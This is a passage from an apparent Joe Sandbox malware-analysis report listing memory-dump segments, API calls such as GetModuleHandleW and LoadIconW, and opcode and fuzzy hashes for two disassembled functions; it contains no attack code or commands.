                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageShowWindow
                                                                                                      • String ID: hide_info
                                                                                                      • API String ID: 1109058218-3109604556
                                                                                                      • Opcode ID: b9230161a3779dda53718df8cb150e70b502c5954e8802a94d92c968c098faf2
                                                                                                      • Instruction ID: 670fa4bd13f936933ccb9705c5f427323db3bd5e0f271bb626fa3a6f08ccd94f
                                                                                                      • Opcode Fuzzy Hash: b9230161a3779dda53718df8cb150e70b502c5954e8802a94d92c968c098faf2
                                                                                                      • Instruction Fuzzy Hash: BAE0E5312002103AFA213226BC67F6B25599BD0B64F00803FF6047A1D2CFA99846811C
                                                                                                      Function 004354E9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(shell32,004212C7,0000000E), ref: 004354F7
                                                                                                      • LoadIconW.USER32(?,0000000E), ref: 0043550D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleIconLoadModule
                                                                                                      • String ID: shell32
                                                                                                      • API String ID: 3495291681-4179111565
                                                                                                      • Opcode ID: 03b9c54a1b8e5c80b5bd845499610cc0e2a2e66cb0a35801c504cfa6e16a83cf
                                                                                                      • Instruction ID: e6696932341dcb94caecbd5586413caec97c01d6295ff654805490fc0b1eae49
                                                                                                      • Opcode Fuzzy Hash: 03b9c54a1b8e5c80b5bd845499610cc0e2a2e66cb0a35801c504cfa6e16a83cf
                                                                                                      • Instruction Fuzzy Hash: 49D05B702205006A67D05F209C4862736D89A04701B10343EB005C2154E734E944FF1C